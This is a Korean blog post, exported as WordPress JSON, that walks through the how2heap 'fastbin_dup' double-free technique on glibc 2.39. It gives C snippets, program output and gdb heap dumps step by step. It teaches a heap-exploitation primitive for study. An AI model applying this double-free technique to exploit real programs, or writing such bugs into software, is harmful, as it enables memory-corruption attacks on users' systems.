{"id":3554,"date":"2025-05-11T16:17:57","date_gmt":"2025-05-11T07:17:57","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3554"},"modified":"2025-05-11T16:18:28","modified_gmt":"2025-05-11T07:18:28","slug":"how2heap-glibc2-39-fastbin_dup","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3554","title":{"rendered":"[how2heap\/glibc2.39] fastbin_dup"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">\ud658\uacbd<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Ubuntu GLIBC 2.39-0ubuntu8.4 \/ Ubuntu 24.04.1 LTS x86_64<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\uc694\uc57d<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">fastbin \ubc94\uc704\ub85c \ud560\ub2f9\ud558\uc5ec tcache\ub97c 7\ubc88 fill\ud574\uc57c, \ub2e4\uc74c\ubc88\uc5d0 \ud560\ub2f9\uc2dc fastbin\uc73c\ub85c \ub118\uc5b4\uac10.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">fastbin \ud55c\ubc88 \ud560\ub2f9\ud558\uace0(\uc5ec\uae30\uae4c\uc9c0 8\ubc88 \ud560\ub2f9\ud568)<br>\uadf8 \uc774\uc804 tcache \ud560\ub2f9\uc8fc\uc18c\ub294 free\ud574\uc11c \uc815\ub9ac\ud55c\ub2e4. 
(1~7\ubc88\uca30 \ud560\ub2f9\uc8fc\uc18c \uc815\ub9ac)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\uc774\uc81c fastbin \ubc94\uc704\ub85c 3\ubc88 \ud560\ub2f9\ud558\uace0, 1, 2, 1\ubc88\uc9f8 \ud560\ub2f9\ub41c \uba54\ubaa8\ub9ac\ub97c \ucc28\ub840\ub85c free\ud558\uace0\ub098\uc11c,<\/strong><br><strong>fastbin \ubc94\uc704\ub85c \ub2e4\uc2dc 3\ubc88 \ud560\ub2f9\ud560\ub54c 1, 3\ubc88\uc9f8\uc5d0\uc11c \uac19\uc740 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0a4\uac8c\ud560 \uc218 \uc788\uc74c \u3147\u3147<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">fastbin은 청크 크기(메타데이터 포함)가 0x20(32)바이트 이상 0x80(128)바이트 이하인 청크를 처리함(x86_64 기본값 기준. 아래 heapinfo의 fastbin[0]~[6]이 (0x20)~(0x80)인 것과 일치).<br>malloc(8)으로 시연함(청크 크기 0x20).<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\ub0b4\uc6a9<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">tcache는 요청 크기 최대 <strong>1,032바이트(청크 크기 0x20~0x410, 메타데이터 포함)<\/strong>의 청크를 <strong>16바이트 간격<\/strong>으로 <strong>64개 bin<\/strong>, <br>각 bin당 <strong>7개<\/strong>씩 보관하는 스레드 로컬 캐시. 
<code>malloc(8)<\/code>은 0x20(32)바이트 청크(사용자 데이터 24바이트 + 헤더 8바이트)로, <br>tcache의 최소 크기 bin에 딱 맞춰 저장됨.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">각 tcache bin은 최대 <strong>7개<\/strong>의 청크만 보관하며, bin이 가득 찬 뒤에 free되는 같은 크기의 청크는 fastbin으로 넘겨지는데, <br>fastbin은 <strong>청크 크기(메타데이터 포함)가 0x20(32)바이트 이상 0x80(128)바이트 이하<\/strong>인 청크를 처리함(x86_64 기본값 기준).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">위 특이점을 참고하고, <br>다음은 fastbin을 활용한 더블 프리(double free) 공격 시연 코드이다.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">1.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">free가 fastbin으로 넘어가게 하기 위해 먼저 0x20 크기 tcache bin 하나를 7개 청크로 가득 채움. 
8개를 malloc(8)로 할당한 뒤 그중 7개(ptrs[0]~ptrs[6])만 free하면 0x20 크기 tcache bin이 가득 차고(아래 heapinfo의 tcache_entry[0](7)), 이후 같은 크기의 free는 tcache 대신 fastbin으로 들어감. 8번째 청크 ptrs[7]은 free하지 않고 그대로 둠.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">이후, calloc(1, 8)로 a, b, c 청크를 3번 할당함. calloc은 tcache를 사용하지 않으므로 tcache에 7개가 남아 있어도 거기서 꺼내지 않고, 이 시점에는 fastbin도 비어 있어서 top chunk에서 새로 잘라 옴 (결과의 a, b, c 주소 0x5555555593a0~0x5555555593e0이 tcache 항목 0x5555555592a0~0x555555559360과 겹치지 않는 이유).<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">        setbuf(stdout, NULL);\n\n        printf(\"This file demonstrates a simple double-free attack with fastbins.\\n\");\n\n        printf(\"Fill up tcache first.\\n\");\n        void *ptrs[8];\n        for (int i=0; i&lt;8; i++) {\n                ptrs[i] = malloc(8);\n        }\n        for (int i=0; i&lt;7; i++) {\n                free(ptrs[i]);\n        }\n\n        printf(\"Allocating 3 buffers.\\n\");\n        int *a = calloc(1, 8);\n        int *b = calloc(1, 8);\n        int *c = calloc(1, 8);\n\n        printf(\"1st calloc(1, 8): %p\\n\", a);\n        printf(\"2nd calloc(1, 8): %p\\n\", b);\n        printf(\"3rd calloc(1, 8): %p\\n\", c);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uacb0\uacfc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">This file demonstrates a simple double-free attack with fastbins.\nFill up tcache first.\nAllocating 3 buffers.\n1st calloc(1, 8): 0x5555555593a0\n2nd calloc(1, 8): 0x5555555593c0\n3rd calloc(1, 8): 0x5555555593e0<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" 
data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk\n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Used                None              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\n0x5555555593d0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593f0 (size : 0x20c10)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 
0x5555555592a0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"675\" height=\"270\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-13.png\" alt=\"\" class=\"wp-image-3555\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-13.png 675w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-13-300x120.png 300w\" sizes=\"auto, (max-width: 675px) 100vw, 675px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">2.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">a \uccad\ud06c\ub97c free \uc2dc\ud0b4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">a \uccad\ud06c\uc5d0 safe-link \uc801\uc6a9\ub41c fd\uac12\uc774 \uc800\uc7a5\ub428 \u3147\u3147<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>fd(orig) = 0<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ucf54\ub4dc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">printf(\"Freeing the first one...\\n\");\nfree(a);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uacb0\uacfc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Freeing the first one...<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              
None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Freed        0x555555559              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\n0x5555555593d0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559390 --> 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593f0 (size : 0x20c10)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"729\" height=\"338\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-14.png\" alt=\"\" class=\"wp-image-3556\" 
srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-14.png 729w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-14-300x139.png 300w\" sizes=\"auto, (max-width: 729px) 100vw, 729px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">3.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\ub9cc\uc57d \ud55c\ubc88\ub354 a \uccad\ud06c \ucd94\uc18c\uc778 0x5555555593a0\uc744 free\ud558\uac8c \ub418\uba74 \ucda9\ub3cc \ubc1c\uc0dd\ud568. <br>\uc65c\ub0d0\uba74, free list\uc758 top\uc5d0 \ud574\ub2f9\ub418\uae30 \ub584\ubb38\uc774\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ub300\uc2e0\uc5d0 \uc774\ubc88\uc5d0\ub294 b \uccad\ud06c\ub97c free\ud568.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>fd(orig) = 0x555555559390<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ucf54\ub4dc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">printf(\"If we free %p again, things will crash because %p is at the top of the free list.\\n\", a, a);\n        \/\/ free(a);\n\n        printf(\"So, instead, we'll free %p.\\n\", b);\n        free(b);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uacb0\uacfc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">If we free 0x5555555593a0 again, things will crash because 0x5555555593a0 is at the top of the free list.\nSo, instead, we'll free 0x5555555593c0.<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ 
parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Freed        0x555555559              None\n0x5555555593b0      0x0                 0x20                 Freed     0x55500000c6c9              None\n0x5555555593d0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x5555555593b0 --> 0x555555559390 --> 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593f0 (size : 0x20c10)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 
0x5555555592a0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"793\" height=\"354\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-15.png\" alt=\"\" class=\"wp-image-3557\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-15.png 793w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-15-300x134.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-15-768x343.png 768w\" sizes=\"auto, (max-width: 793px) 100vw, 793px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">4.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">free list\uc758 head\uac00 \uc544\ub2c8\uae30 \ub54c\ubb38\uc5d0, \uc774\uc81c a \uccad\ud06c\ub97c \ud55c\ubc88\ub354 free \ud560 \uc218 \uc788\uc5b4 \ud574\ubcf8\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uadf8\ub7ec\uba74, a\uccad\ud06c\uc758 fd(orig)\ub294 0x5555555593b0\uc778 b\uccad\ud06c\ub97c \uac00\ub9ac\ud0a8\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uc774\uc81c freelist\uc5d0\ub294 a, b, a \uccad\ud06c \uc8fc\uc18c\uac00 \ub4e4\uc5b4\uc788\uc5b4\uc11c, 3\ubc88 malloc\uc744 \ud558\uba74\uc740 <br>a\uccad\ud06c \uc8fc\uc18c\uc778 0x5555555593a0\ub97c 2\ubc88 \ud560\ub2f9\ubc1b\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ucf54\ub4dc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">printf(\"Now, we can free %p again, since it's not the head of the free list.\\n\", a);\n        free(a);\n\n        printf(\"Now the free list has [ %p, %p, %p ]. 
If we malloc 3 times, we'll get %p twice!\\n\", a, b, a, a);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uacb0\uacfc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Now, we can free 0x5555555593a0 again, since it's not the head of the free list.\nNow the free list has [ 0x5555555593a0, 0x5555555593c0, 0x5555555593a0 ]. If we malloc 3 times, we'll get 0x5555555593a0 twice!<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Freed     0x55500000c6e9        
      None\n0x5555555593b0      0x0                 0x20                 Freed     0x55500000c6c9              None\n0x5555555593d0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559390 --> 0x5555555593b0 --> 0x555555559390 (overlap chunk with 0x555555559390(freed) )\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593f0 (size : 0x20c10)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"798\" height=\"361\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-16.png\" alt=\"\" class=\"wp-image-3558\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-16.png 798w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-16-300x136.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-16-768x347.png 768w\" sizes=\"auto, (max-width: 798px) 100vw, 798px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">5.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">1, 3\ubc88\uc9f8 \ud560\ub2f9\ubc1b\ub294 \uc8fc\uc18c\uac00 \uc774\uc81c \uc11c\ub85c \uac19\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ucf54\ub4dc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">a = calloc(1, 8);\n        b = calloc(1, 8);\n        c = calloc(1, 8);\n        
printf(\"1st calloc(1, 8): %p\\n\", a);\n        printf(\"2nd calloc(1, 8): %p\\n\", b);\n        printf(\"3rd calloc(1, 8): %p\\n\", c);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uacb0\uacfc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">1st calloc(1, 8): 0x5555555593a0\n2nd calloc(1, 8): 0x5555555593c0\n3rd calloc(1, 8): 0x5555555593a0<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Used                None              None\n0x5555555593b0      
0x0                 0x20                 Used                None              None\n0x5555555593d0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559 (invaild memory)\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593f0 (size : 0x20c10)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"676\" height=\"294\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-17.png\" alt=\"\" class=\"wp-image-3559\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-17.png 676w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-17-300x130.png 300w\" sizes=\"auto, (max-width: 676px) 100vw, 676px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">참고 1: tcache에 0x20 청크가 7개 남아 있는데도 세 번의 calloc이 fastbin에서 꺼내 온 것은 calloc이 tcache를 사용하지 않기 때문이다(위 heapinfo에서 tcache_entry[0](7)이 그대로인 것으로 확인됨). 같은 자리에 malloc(8)을 쓰면 tcache의 7개가 먼저 반환되므로 이 순서대로 a, b, a가 나오지 않는다.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">참고 2: heapinfo의 fastbin[0] head가 0x555555559(invalid memory)로 남는 것은 safe-linking의 결과다. fastbin의 fd는 (fd 필드 주소 >> 12) ^ next 형태로 저장되는데(예: b의 fd(orig) 0x555555559390이 0x55500000c6c9로 보이는 것), a가 3번째 calloc에서 두 번째로 반환될 때 a의 fd 필드는 1번째 calloc이 0으로 채워 둔 상태라 (0x5555555593a0 >> 12) ^ 0 = 0x555555559가 그대로 head로 올라간다. 이 상태에서 같은 크기를 fastbin에서 한 번 더 꺼내면 이 잘못된 포인터를 따라가게 되므로, 이 bin에서 추가 할당을 하지 않도록 주의해야 한다.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\ud658\uacbd Ubuntu GLIBC 2.39-0ubuntu8.4 \/ Ubuntu 24.04.1 LTS x86_64 \uc694\uc57d fastbin \ubc94\uc704\ub85c \ud560\ub2f9\ud558\uc5ec tcache\ub97c 7\ubc88 fill\ud574\uc57c, \ub2e4\uc74c\ubc88\uc5d0 \ud560\ub2f9\uc2dc fastbin\uc73c\ub85c \ub118\uc5b4\uac10. fastbin \ud55c\ubc88 \ud560\ub2f9\ud558\uace0(\uc5ec\uae30\uae4c\uc9c0 8\ubc88 \ud560\ub2f9\ud568)\uadf8 \uc774\uc804 tcache \ud560\ub2f9\uc8fc\uc18c\ub294 free\ud574\uc11c \uc815\ub9ac\ud55c\ub2e4. 
(1~7\ubc88\uca30 \ud560\ub2f9\uc8fc\uc18c \uc815\ub9ac) \uc774\uc81c fastbin \ubc94\uc704\ub85c 3\ubc88 \ud560\ub2f9\ud558\uace0, 1, 2, 1\ubc88\uc9f8 \ud560\ub2f9\ub41c \uba54\ubaa8\ub9ac\ub97c \ucc28\ub840\ub85c free\ud558\uace0\ub098\uc11c,fastbin \ubc94\uc704\ub85c \ub2e4\uc2dc 3\ubc88 \ud560\ub2f9\ud560\ub54c 1, 3\ubc88\uc9f8\uc5d0\uc11c \uac19\uc740 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0a4\uac8c\ud560 \uc218&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3554\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[how2heap\/glibc2.39] fastbin_dup<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[52],"tags":[53,35,51,25],"class_list":["post-3554","post","type-post","status-publish","format-standard","hentry","category-how2heap","tag-fastbin","tag-heap","tag-how2heap","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3554"}],"version-history":[{"count":2,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3554\/revisions"}],"predece
ssor-version":[{"id":3561,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3554\/revisions\/3561"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}